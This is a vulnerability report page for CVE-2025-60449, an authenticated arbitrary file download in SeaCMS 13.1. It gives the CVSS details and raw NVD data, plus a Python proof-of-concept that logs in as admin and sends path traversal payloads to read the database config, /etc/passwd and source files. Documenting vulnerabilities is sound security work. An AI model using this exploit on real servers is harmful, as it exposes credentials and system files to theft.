Security Vulnerability Report
CVE-2025-60449 CVSS 4.9 MEDIUM

CVE-2025-60449

Published: 2025-10-03 14:15:46
Last Modified: 2025-10-08 15:20:56

Description

An information disclosure vulnerability has been discovered in SeaCMS 13.1. The vulnerability exists in the admin_safe.php component located in the /btcoan/ directory. This security flaw allows an authenticated administrator to scan and download not only the application’s source code but also potentially any file accessible on the server’s root directory. Because an administrator login is required, the CVSS vector rates privileges required as high (PR:H), which is why the overall score is MEDIUM despite the high confidentiality impact (C:H).

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:seacms:seacms:13.1:*:*:*:*:*:*:* - VULNERABLE
SeaCMS 13.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-60449 PoC - SeaCMS 13.1 Information Disclosure # Vulnerability: Arbitrary File Download via admin_safe.php in /btcoan/ # Requires authenticated admin credentials import requests # Target configuration TARGET_URL = "http://target-seacms-site.com" ADMIN_USERNAME = "admin" ADMIN_PASSWORD = "admin_password" # Step 1: Login as administrator to obtain session cookie session = requests.Session() login_url = f"{TARGET_URL}/admin/login.php" login_data = { "username": ADMIN_USERNAME, "password": ADMIN_PASSWORD, "submit": "submit" } response = session.post(login_url, data=login_data) print(f"[*] Login response status: {response.status_code}") # Step 2: Exploit the arbitrary file download vulnerability # The vulnerable endpoint is admin_safe.php in /btcoan/ directory vuln_url = f"{TARGET_URL}/btcoan/admin_safe.php" # Craft payload to traverse directories and read sensitive files # Example: Download the application's configuration file payloads = [ # Read SeaCMS database configuration {"action": "download", "filename": "../../../include/config.inc.php"}, # Read system passwd file {"action": "download", "filename": "../../../../../../etc/passwd"}, # Read source code files {"action": "download", "filename": "../admin/index.php"}, ] for payload in payloads: print(f"[*] Attempting to download: {payload['filename']}") response = session.post(vuln_url, data=payload) if response.status_code == 200 and len(response.content) > 0: print(f"[+] Successfully downloaded file content:") print(response.text[:500]) print("---") else: print(f"[-] Failed to download file") # Alternative GET-based exploitation vuln_url_get = f"{TARGET_URL}/btcoan/admin_safe.php?action=download&filename=../../../include/config.inc.php" response = session.get(vuln_url_get) print(f"[*] GET-based exploit response: {response.status_code}") if response.status_code == 200: print(f"[+] File content leaked:") print(response.text[:1000])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60449", "sourceIdentifier": "[email protected]", "published": "2025-10-03T14:15:46.407", "lastModified": "2025-10-08T15:20:55.803", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An information disclosure vulnerability has been discovered in SeaCMS 13.1. The vulnerability exists in the admin_safe.php component located in the /btcoan/ directory. This security flaw allows authenticated administrators to scan and download not only the application’s source code but also potentially any file accessible on the server’s root directory."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:seacms:seacms:13.1:*:*:*:*:*:*:*", "matchCriteriaId": "6FD99F78-3066-4826-96DA-6F8466EDB1B7"}]}]}], "references": [{"url": "https://snowhy77.github.io/2025/08/21/Information-Disclosure-Vulnerability-in-SeaCMS/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}